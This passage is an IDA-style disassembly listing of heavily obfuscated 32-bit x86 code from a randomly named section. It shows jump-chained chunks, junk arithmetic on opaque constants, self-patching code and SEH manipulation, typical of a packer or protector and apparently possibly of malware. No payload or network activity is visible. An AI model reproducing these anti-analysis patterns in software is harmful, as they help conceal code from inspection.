; END OF FUNCTION CHUNK	FOR sub_439AE3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_234. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446F26

loc_44208D:				; CODE XREF: sub_446F26+97AFj
		jmp	loc_44E50D
; END OF FUNCTION CHUNK	FOR sub_446F26
; ---------------------------------------------------------------------------

loc_442092:				; CODE XREF: hvvrg7ie:0044DD65j
		jmp	loc_43EBED
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_110. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444E49

loc_442098:				; CODE XREF: sub_444E49:loc_444E53j
		mov	esp, ebp
		pop	ebp
		push	offset loc_445EB4
		jmp	nullsub_52
; END OF FUNCTION CHUNK	FOR sub_444E49
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451669

loc_4420A5:				; CODE XREF: sub_451669-1476j
		push	offset loc_44747D
		jmp	loc_4397EF
; END OF FUNCTION CHUNK	FOR sub_451669
; ---------------------------------------------------------------------------
		call	sub_44DE0A
		mov	edx, 43A8AC5Ch
		call	sub_446A16
		call	sub_44DE0A
		mov	edx, 1F56AC7Bh
		call	sub_446A16
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C40C

loc_4420CE:				; CODE XREF: sub_43C40C:loc_43ED2Cj
		pop	ebx
		pop	ebp
		retn	4
; END OF FUNCTION CHUNK	FOR sub_43C40C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439990

loc_4420D3:				; CODE XREF: sub_439990+72A4j
		jmp	loc_4481C7
; END OF FUNCTION CHUNK	FOR sub_439990
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447744

loc_4420D8:				; CODE XREF: sub_447744-C3F4j
		push	offset sub_45A0B1
		jmp	loc_43D183
; END OF FUNCTION CHUNK	FOR sub_447744

; =============== S U B	R O U T	I N E =======================================



sub_4420E2	proc near		; CODE XREF: hvvrg7ie:0043FC43j
					; sub_443048:loc_44FAECp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00444E3A SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		add	ecx, 0DA8FCB52h
		xchg	ecx, [esp-4+arg_0]
		jmp	loc_444E3A
sub_4420E2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4533F2

loc_4420F4:				; CODE XREF: sub_4533F2+B28j
		jl	loc_44E655
; END OF FUNCTION CHUNK	FOR sub_4533F2
; START	OF FUNCTION CHUNK FOR sub_44736C

loc_4420FA:				; CODE XREF: sub_44736C+11AEEj
		jmp	loc_44FF08
; END OF FUNCTION CHUNK	FOR sub_44736C
; ---------------------------------------------------------------------------
		jg	loc_44E1EB
		xor	ebp, edx
		mov	[ebp+0], ecx
		jmp	loc_44E649
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BCAE

loc_44210F:				; CODE XREF: sub_44BCAE+7BDj
		add	eax, 0F4BEE131h
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_4407BA
		jmp	loc_44C101
; END OF FUNCTION CHUNK	FOR sub_44BCAE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_233. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D531

loc_442125:				; CODE XREF: sub_43D531+13377j
		rol	edx, 0Ch
		test	ecx, ebp
		jmp	loc_455163
; END OF FUNCTION CHUNK	FOR sub_43D531
; ---------------------------------------------------------------------------

loc_44212F:				; CODE XREF: hvvrg7ie:loc_45632Bj
		mov	eax, 32FE4135h
		call	sub_450C5A
		push	edi

loc_44213A:				; CODE XREF: hvvrg7ie:loc_43A003j
		push	offset sub_444BE1
		jmp	locret_458725
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459A95

loc_442144:				; CODE XREF: sub_459A95:loc_43CCDCj
		xchg	ecx, [esp+4+var_4]
		jmp	loc_458069
; END OF FUNCTION CHUNK	FOR sub_459A95
; ---------------------------------------------------------------------------
		push	9A016539h
		ror	ecx, 16h
		jmp	sub_44241C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451DFF

loc_442159:				; CODE XREF: sub_451DFF:loc_43FF43j
		xchg	esi, [esp+4+var_4]
		jmp	loc_4495AB
; END OF FUNCTION CHUNK	FOR sub_451DFF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A7E8

loc_442161:				; CODE XREF: sub_45A7E8:loc_4394F1j
		mov	edi, eax
		xchg	edi, [esp+0]
; END OF FUNCTION CHUNK	FOR sub_45A7E8
; START	OF FUNCTION CHUNK FOR sub_4527A1

loc_442166:				; CODE XREF: sub_4527A1:loc_44A014j
		mov	edx, eax
		push	offset sub_4396DB
		jmp	nullsub_233
; END OF FUNCTION CHUNK	FOR sub_4527A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_442172:				; CODE XREF: sub_450434:loc_459387j
		rol	edx, 18h
		jnb	loc_451345
		or	ecx, 9A0E9E08h
		xor	ebp, esi
		jmp	loc_45133C
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455ACA

loc_442188:				; CODE XREF: sub_455ACA:loc_44D37Dj
		and	eax, 0CD1DCADAh
		add	eax, 81CBCC3Dh
		sub	eax, 0CEF9701Eh
		and	eax, 0FC784802h
		add	eax, 8BE52332h
		mov	eax, [eax]
		or	eax, eax
		jmp	loc_455A5B
; END OF FUNCTION CHUNK	FOR sub_455ACA
; ---------------------------------------------------------------------------
		mov	[eax], ecx
		adc	eax, edi
		jmp	sub_43E128
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456CD4

loc_4421B8:				; CODE XREF: sub_456CD4-14791j
		or	edi, 670AC8B9h
		and	edi, 7839C683h
		or	edi, ds:4000F8h
		add	edi, 65F93616h
		add	esi, edi

loc_4421D2:				; CODE XREF: hvvrg7ie:loc_4532B7j
		pop	edi
		jmp	loc_4496A0
; END OF FUNCTION CHUNK	FOR sub_456CD4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_501. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4421D9:				; CODE XREF: hvvrg7ie:004393ADj
		jmp	loc_456838

; =============== S U B	R O U T	I N E =======================================



sub_4421DE	proc near		; CODE XREF: hvvrg7ie:0043C377j
					; hvvrg7ie:0044A856p

; FUNCTION CHUNK AT 0044C0E3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044DBD7 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00453376 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004577D0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B21D SIZE 0000000F BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	ebx
		push	eax
		pop	ebx
		xchg	ebx, [esp+0]
		jmp	loc_4577D0
sub_4421DE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		add	esi, 0A2052A44h
		jmp	sub_455CB0
; ---------------------------------------------------------------------------

locret_4421F8:				; CODE XREF: hvvrg7ie:loc_451902j
		retn
; ---------------------------------------------------------------------------

loc_4421F9:				; CODE XREF: hvvrg7ie:004468A0j
		jmp	nullsub_509
; ---------------------------------------------------------------------------

loc_4421FE:				; CODE XREF: hvvrg7ie:004460D6j
		jmp	loc_4567FC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FA98

loc_442203:				; CODE XREF: sub_43FA98+6j
		jmp	loc_447606
; END OF FUNCTION CHUNK	FOR sub_43FA98
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452F78

loc_442208:				; CODE XREF: sub_452F78+Fj
		push	offset loc_440DA7
		jmp	loc_44E507
; END OF FUNCTION CHUNK	FOR sub_452F78
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_172. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_442213:				; CODE XREF: hvvrg7ie:0045AA90j
		jge	loc_450EBA
		not	ecx
		or	ecx, 9EDD4B27h
		ja	loc_43BDC4
		pop	eax
		jmp	loc_450EB8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D16B

loc_44222D:				; CODE XREF: sub_43D16B:loc_440D02j
		mov	ebp, esp
		add	esp, 0FFFFFFECh
		cmp	ds:dword_458D54, 0
		jnz	loc_456CAD
		jmp	loc_45A250
; END OF FUNCTION CHUNK	FOR sub_43D16B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44955C

loc_442244:				; CODE XREF: sub_44955C-9C1Cj
		mov	eax, [esp-8+arg_4]
		push	ecx
		mov	ecx, edx
		call	sub_43B2C4

loc_44224F:				; CODE XREF: sub_440195+10949j
		jmp	loc_44CBEE
; END OF FUNCTION CHUNK	FOR sub_44955C
; ---------------------------------------------------------------------------

loc_442254:				; CODE XREF: hvvrg7ie:0044DCFFj
		jmp	loc_44C9F5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_442259:				; CODE XREF: sub_43D285-27D7j
		jmp	loc_441C67
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
		mov	ds:off_41D064, eax
		lea	eax, loc_45828F
		mov	byte ptr [eax],	0C3h
		jmp	loc_45828F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449425

loc_442272:				; CODE XREF: sub_449425-829Dj
					; sub_449425:loc_45828Fj
		pop	edx
		jmp	loc_4575C6
; END OF FUNCTION CHUNK	FOR sub_449425
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CB5

loc_442278:				; CODE XREF: sub_445CB5:loc_44B2BFj
		mov	edx, eax
		push	eax
		push	258AB65h
		xchg	ebx, [esp+14h+var_14]
		mov	eax, ebx
		pop	ebx
		or	eax, 39206AC6h
		jmp	loc_4559F2
; END OF FUNCTION CHUNK	FOR sub_445CB5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E533

loc_442291:				; CODE XREF: sub_44E533-5E22j
		jns	loc_449D11

loc_442297:				; CODE XREF: sub_44C782+13j
		jmp	nullsub_310
; END OF FUNCTION CHUNK	FOR sub_44E533
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441A70

loc_44229C:				; CODE XREF: sub_441A70+Dj
		jmp	loc_45449C
; END OF FUNCTION CHUNK	FOR sub_441A70
; ---------------------------------------------------------------------------
		or	ebp, eax
		jmp	loc_43A7A4

; =============== S U B	R O U T	I N E =======================================



sub_4422A8	proc near		; CODE XREF: sub_447D56:loc_43C041j
					; sub_44ED23-10FDp

; FUNCTION CHUNK AT 00440EB3 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044312D SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044C957 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044FC4D SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00452A74 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]

loc_4422AB:				; CODE XREF: hvvrg7ie:00447934j
		pop	ebx
		mov	eax, [eax]
		mov	al, [eax]
		jz	loc_44C957
		call	sub_45423F

loc_4422BB:				; CODE XREF: sub_44E5CA+Ej
		jmp	loc_44FC4D
sub_4422A8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449466

loc_4422C0:				; CODE XREF: sub_449466+Ej
		jmp	loc_43E8F5
; END OF FUNCTION CHUNK	FOR sub_449466
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440402

loc_4422C5:				; CODE XREF: sub_440402+F4E1j
		mov	eax, [eax]
		push	offset loc_43FB72
		jmp	nullsub_377
; END OF FUNCTION CHUNK	FOR sub_440402
; ---------------------------------------------------------------------------

locret_4422D1:				; CODE XREF: hvvrg7ie:0044DB73j
		retn
; ---------------------------------------------------------------------------

loc_4422D2:				; CODE XREF: hvvrg7ie:00444255j
		jmp	loc_44CCBA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439549

loc_4422D7:				; CODE XREF: sub_439549+8F16j
		jmp	loc_446916
; END OF FUNCTION CHUNK	FOR sub_439549
; ---------------------------------------------------------------------------
		push	esi
		cmp	ebp, ebx
		jmp	loc_44E729
; ---------------------------------------------------------------------------
		or	eax, eax
		jnz	loc_459892
		jmp	loc_43AFD9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_196. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D5FD

loc_4422F2:				; CODE XREF: sub_43D5FD+18FF2j
		jmp	loc_45393F
; END OF FUNCTION CHUNK	FOR sub_43D5FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D149

loc_4422F7:				; CODE XREF: sub_44D149-4530j
		jmp	loc_452E63
; END OF FUNCTION CHUNK	FOR sub_44D149
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_4422FC:				; CODE XREF: sub_445CCD-B614j
		jmp	loc_45178D
; END OF FUNCTION CHUNK	FOR sub_445CCD

; =============== S U B	R O U T	I N E =======================================



sub_442301	proc near		; DATA XREF: sub_44C33E+35C8o

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004391BA SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0043DB0E SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043F8BB SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00447DB6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A94F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004566A3 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045872B SIZE 00000005 BYTES

		call	sub_446A16
		call	sub_44DE0A
		push	91639324h
		pop	edx
		rol	edx, 1
		jmp	loc_45872B
sub_442301	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450246

loc_442318:				; CODE XREF: sub_450246:loc_4457FFj
		xor	eax, 1BEE752Bh
		and	eax, 0C50E276Dh
		xor	eax, 17F8E621h
		call	sub_43AC3B

loc_44232F:				; CODE XREF: sub_4417B1-5A75j
		jmp	loc_44453B
; END OF FUNCTION CHUNK	FOR sub_450246

; =============== S U B	R O U T	I N E =======================================



sub_442334	proc near		; DATA XREF: sub_44B1C6-FD82o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043E56F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444C35 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044519C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447DBC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D2EB SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044D3F9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452BDA SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00452BFA SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00456ED4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457EA3 SIZE 0000002C BYTES
; FUNCTION CHUNK AT 0045A93D SIZE 00000005 BYTES

		test	al, al
		jz	loc_44D2EB
		jmp	loc_44EE1E
sub_442334	endp

; ---------------------------------------------------------------------------

locret_442341:				; CODE XREF: hvvrg7ie:loc_43C953j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ABE8

loc_442342:				; CODE XREF: sub_44ABE8+Ej
		jmp	sub_45038A
; END OF FUNCTION CHUNK	FOR sub_44ABE8
; ---------------------------------------------------------------------------

loc_442347:				; CODE XREF: hvvrg7ie:0044AF8Fj
		ja	loc_4596BE
		pop	ecx
		test	eax, edi
		jmp	loc_450BBF
; ---------------------------------------------------------------------------
		xchg	edi, [esi]
		xor	ebp, 1D72A554h
		jmp	sub_43EF3E
; ---------------------------------------------------------------------------
		dw 0C78Bh
		dd 0F8E26A68h, 0E9F83BDEh, 0FFFFE2E8h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BE1

loc_442370:				; CODE XREF: sub_444BE1+5807j
		jnz	loc_458EC6
		jmp	loc_4417C1
; END OF FUNCTION CHUNK	FOR sub_444BE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E6A5

loc_44237B:				; CODE XREF: sub_44E6A5:loc_446461j
		jge	loc_44C427
; END OF FUNCTION CHUNK	FOR sub_44E6A5
; START	OF FUNCTION CHUNK FOR sub_450C5A

loc_442381:				; CODE XREF: sub_450C5A+213j
		jmp	sub_445488
; END OF FUNCTION CHUNK	FOR sub_450C5A
; ---------------------------------------------------------------------------
		jnb	loc_443984
		sub	eax, ebp
		xor	edi, ecx
		ja	loc_45A7E3
		jmp	loc_43997E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451669

loc_44239B:				; CODE XREF: sub_451669-11977j
		add	eax, 4
		mov	ebp, [eax]
		add	eax, 4
		mov	edx, [eax]
		mov	al, 1
		call	edx
		jmp	loc_45773B
; END OF FUNCTION CHUNK	FOR sub_451669
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A889

loc_4423AE:				; CODE XREF: sub_45A889:loc_447D64j
		or	ecx, 0B75D26CBh
		and	ecx, 636B9F3Fh
		or	ecx, ds:4000F1h
		jnz	loc_453D6A
; END OF FUNCTION CHUNK	FOR sub_45A889
; START	OF FUNCTION CHUNK FOR sub_44B69F

loc_4423C6:				; CODE XREF: sub_44B69F+B6BCj
		jmp	loc_44E962
; END OF FUNCTION CHUNK	FOR sub_44B69F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C4D7

loc_4423CB:				; CODE XREF: sub_43C4D7+190F1j
		jmp	loc_45AA95
; END OF FUNCTION CHUNK	FOR sub_43C4D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4468C2

loc_4423D0:				; CODE XREF: sub_4468C2+Fj
		jmp	loc_45B69A
; END OF FUNCTION CHUNK	FOR sub_4468C2
; ---------------------------------------------------------------------------
		mov	ebx, 0B0B19E80h
		shl	ebx, 4
		jmp	loc_459502
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458095

loc_4423E2:				; CODE XREF: sub_458095-BD10j
		pop	edx
		or	esi, 2AB243A7h

loc_4423E9:				; CODE XREF: hvvrg7ie:loc_442E3Cj
		sub	esi, 0EDB8E9BCh
		test	esi, 1000h
		jmp	loc_456E54
; END OF FUNCTION CHUNK	FOR sub_458095
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_4423FA:				; CODE XREF: sub_43F227:loc_439833j
		jz	loc_453438
		jmp	loc_44F926
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------

loc_442405:				; CODE XREF: hvvrg7ie:00457F33j
		cdq

; =============== S U B	R O U T	I N E =======================================



sub_442406	proc near		; CODE XREF: sub_446966:loc_45B207p
		xchg	edi, [esp+0]
		pop	edi
		neg	eax
		cmp	ax, 0A5B3h
		jnz	loc_446970
		retn
sub_442406	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_442417:				; CODE XREF: sub_44D2F8-3484j
		call	sub_452F3F
; END OF FUNCTION CHUNK	FOR sub_44D2F8

; =============== S U B	R O U T	I N E =======================================



sub_44241C	proc near		; CODE XREF: sub_43FC1D:loc_43B0CFp
					; hvvrg7ie:00442154j

arg_0		= dword	ptr  4

		xchg	edx, [esp+0]
		pop	edx
		add	esi, 1A4606AEh
		xchg	esi, [esp-4+arg_0]
		jmp	sub_4525FC
sub_44241C	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44242E	proc near		; DATA XREF: sub_45AD46-260Ao
		push	esi
		pushf
		call	sub_43FB25
sub_44242E	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43E26C

loc_442435:				; CODE XREF: sub_43E26C:loc_43E274j
		jmp	loc_453E30
; END OF FUNCTION CHUNK	FOR sub_43E26C
; ---------------------------------------------------------------------------

loc_44243A:				; CODE XREF: hvvrg7ie:0043CDE6j
		jmp	loc_456C6A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439549

loc_44243F:				; CODE XREF: sub_439549:loc_43D514j
		sub	edx, 20BF7338h
		xor	edx, 36B81405h
		push	eax
		pushf
		push	90F02638h
		pop	eax
		and	eax, 974BD34Eh
		xor	eax, 5C0DB279h
		jmp	loc_4422D7
; END OF FUNCTION CHUNK	FOR sub_439549
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_254. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_442465:				; CODE XREF: hvvrg7ie:00445F56j
		call	sub_458D28
		mov	eax, 4CF1C9EDh
		call	sub_450C5A
		push	ecx
		push	35920C04h
		xchg	eax, [esp]
		jmp	loc_43E717
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44370F

loc_442482:				; CODE XREF: sub_44370F+12319j
		jz	loc_454F0C
		jmp	loc_44BD57
; END OF FUNCTION CHUNK	FOR sub_44370F
; ---------------------------------------------------------------------------
		or	esi, ecx
		jmp	loc_449D72
; ---------------------------------------------------------------------------
		or	ebx, 32D13057h
		sub	eax, 0BA973D67h
		jmp	sub_44F548
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_107. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4424A6	proc near		; CODE XREF: sub_440643+C34Bp
					; sub_44059F:loc_45305Cp

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B867 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D0F0 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00441B58 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00454DFB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AF14 SIZE 00000017 BYTES

		push	ebp
		mov	ebp, esp
		push	ebx
		push	ecx
		jmp	loc_45AF14
sub_4424A6	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CD0B

loc_4424B0:				; CODE XREF: sub_43CD0B+1B530j
		jnz	loc_439F91

loc_4424B6:				; CODE XREF: sub_43CD0B:loc_45822Aj
		xor	ecx, 2298F147h
		and	ecx, 1DC1D426h
		xor	ecx, 0E7935476h
		test	ecx, 2
		jmp	loc_45664E
; END OF FUNCTION CHUNK	FOR sub_43CD0B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B1C6

loc_4424D3:				; CODE XREF: sub_44B1C6:loc_43F4DEj
		jge	loc_45AFCB
; END OF FUNCTION CHUNK	FOR sub_44B1C6
; START	OF FUNCTION CHUNK FOR sub_4495B9

loc_4424D9:				; CODE XREF: sub_4495B9+6AE1j
		jmp	loc_43A442
; END OF FUNCTION CHUNK	FOR sub_4495B9
; ---------------------------------------------------------------------------
		xchg	ebp, eax
		sbb	ebx, edi
		shl	ebp, 1
		jmp	loc_45AFCB
; ---------------------------------------------------------------------------

loc_4424E9:				; CODE XREF: hvvrg7ie:0045827Bj
		xchg	ebp, [ebx]
		rol	ecx, 11h
; START	OF FUNCTION CHUNK FOR sub_43C290

loc_4424EE:				; CODE XREF: sub_43C290:loc_441A49j
		shr	ebp, 2
		jmp	loc_44BAF2
; END OF FUNCTION CHUNK	FOR sub_43C290
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426E2

loc_4424F6:				; CODE XREF: sub_4426E2+D8DFj
		jnz	loc_45584C
		xchg	esi, [eax]
		jmp	loc_455843
; END OF FUNCTION CHUNK	FOR sub_4426E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4584F2

loc_442503:				; CODE XREF: sub_4584F2-F67Fj
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		pop	ebp
		push	78776CB3h
		pop	eax
		rol	eax, 0Fh
		sub	eax, 66A307ACh
		jmp	loc_443F8F
; END OF FUNCTION CHUNK	FOR sub_4584F2
; ---------------------------------------------------------------------------
		shl	edx, 13h
		jmp	loc_4426E1
; ---------------------------------------------------------------------------

loc_442525:				; CODE XREF: hvvrg7ie:0043BD7Bj
		jle	loc_454FF7
; START	OF FUNCTION CHUNK FOR sub_456CD4

loc_44252B:				; CODE XREF: sub_456CD4-5591j
		and	esi, 5FA60BD5h
		xor	esi, 660A096Fh
		add	esi, ebp
		push	edi
		push	624BEF44h
		pop	edi
		rol	edi, 19h
		jmp	loc_4421B8
; END OF FUNCTION CHUNK	FOR sub_456CD4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B048

loc_442548:				; CODE XREF: sub_45B048-21CA9j
					; sub_45B048:loc_44DBC1j
		pop	large dword ptr	fs:0
		add	esp, 4
		push	15835050h
		pop	eax
		jmp	loc_451FCD
; END OF FUNCTION CHUNK	FOR sub_45B048
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411F6

loc_44255D:				; CODE XREF: sub_4411F6:loc_447D6Ej
		pop	ebp
		mov	eax, [esp-8+arg_4]
		call	sub_446901

loc_442566:				; CODE XREF: sub_44914D-1BA7j
		jmp	nullsub_65
; END OF FUNCTION CHUNK	FOR sub_4411F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403D4

loc_44256B:				; CODE XREF: sub_4403D4+11AAj
		sub	al, 99h
		mov	edx, [ebp+var_4]
		push	offset sub_44CF35
; END OF FUNCTION CHUNK	FOR sub_4403D4
; START	OF FUNCTION CHUNK FOR sub_4418F0

loc_442575:				; CODE XREF: sub_4418F0:loc_4560C6j
		jmp	nullsub_230
; END OF FUNCTION CHUNK	FOR sub_4418F0
; ---------------------------------------------------------------------------

loc_44257A:				; CODE XREF: hvvrg7ie:0044B93Fj
		push	81043581h

loc_44257F:				; CODE XREF: hvvrg7ie:0044CEBBj
		pop	ebx
		sub	ebx, 83E3CF3Fh
		or	ebx, 27A7241Ch
		and	ebx, 0C321A2B7h
		jmp	loc_45016B
; ---------------------------------------------------------------------------

loc_442597:				; CODE XREF: hvvrg7ie:0043D5A1j
		sbb	esi, 742FB413h

loc_44259D:				; CODE XREF: hvvrg7ie:loc_43D584j
		or	edx, 0F2D8CAD9h
		cmp	edx, 0E2F6A69Fh
		jmp	loc_4507A5
; ---------------------------------------------------------------------------

loc_4425AE:				; DATA XREF: hvvrg7ie:0043BC51o
		call	sub_4489AE
		mov	eax, 0A5559D12h
		push	edi
		mov	edi, esi
		xchg	edi, [esp]
		push	11CBDE2Fh
		pop	esi
		add	esi, 17927583h
		jmp	loc_43DB1F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45196D

loc_4425CF:				; CODE XREF: sub_45196D:loc_4462BEj
		pop	esi
		add	esi, 74A4736Eh
		rol	esi, 4
		add	esi, 497063EFh
		jnz	loc_44BC81
		mov	[ecx], ebx
		add	edx, edi
		xor	ebp, ecx
		jmp	loc_44BC81
; END OF FUNCTION CHUNK	FOR sub_45196D

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4425F0	proc near		; CODE XREF: hvvrg7ie:loc_439087p
					; sub_441167-2E59p ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00449C00 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00451226 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0045293E SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00454293 SIZE 00000005 BYTES

		push	ecx
		mov	ecx, ebp
		xchg	ecx, [esp+0]
		mov	ebp, esp
		push	eax
		jmp	loc_45293E
sub_4425F0	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4437CA

loc_4425FE:				; CODE XREF: sub_4437CA+16j
		add	eax, 24CB46B2h
		call	sub_450C5A
		mov	ds:dword_41D0A0, eax
		lea	eax, nullsub_275
		jmp	loc_457D17
; END OF FUNCTION CHUNK	FOR sub_4437CA
; ---------------------------------------------------------------------------

loc_44261A:				; CODE XREF: hvvrg7ie:0045A2AAj
		mov	ecx, edx

; =============== S U B	R O U T	I N E =======================================



sub_44261C	proc near		; CODE XREF: hvvrg7ie:00457D20p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043B0F0 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044475A SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx

loc_442620:				; CODE XREF: hvvrg7ie:0044D3DDj
		mov	eax, [esp+0]
		push	edx
		jmp	loc_44475A
sub_44261C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450E01

loc_442629:				; CODE XREF: sub_450E01:loc_4567DEj
		push	edx
		call	sub_4562DC
		mov	eax, 510AEA73h
		push	ebx
		push	3A64C6ACh
		pop	ebx
		jmp	loc_445714
; END OF FUNCTION CHUNK	FOR sub_450E01
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B3BE

loc_442640:				; CODE XREF: hvvrg7ie:0043BC02j
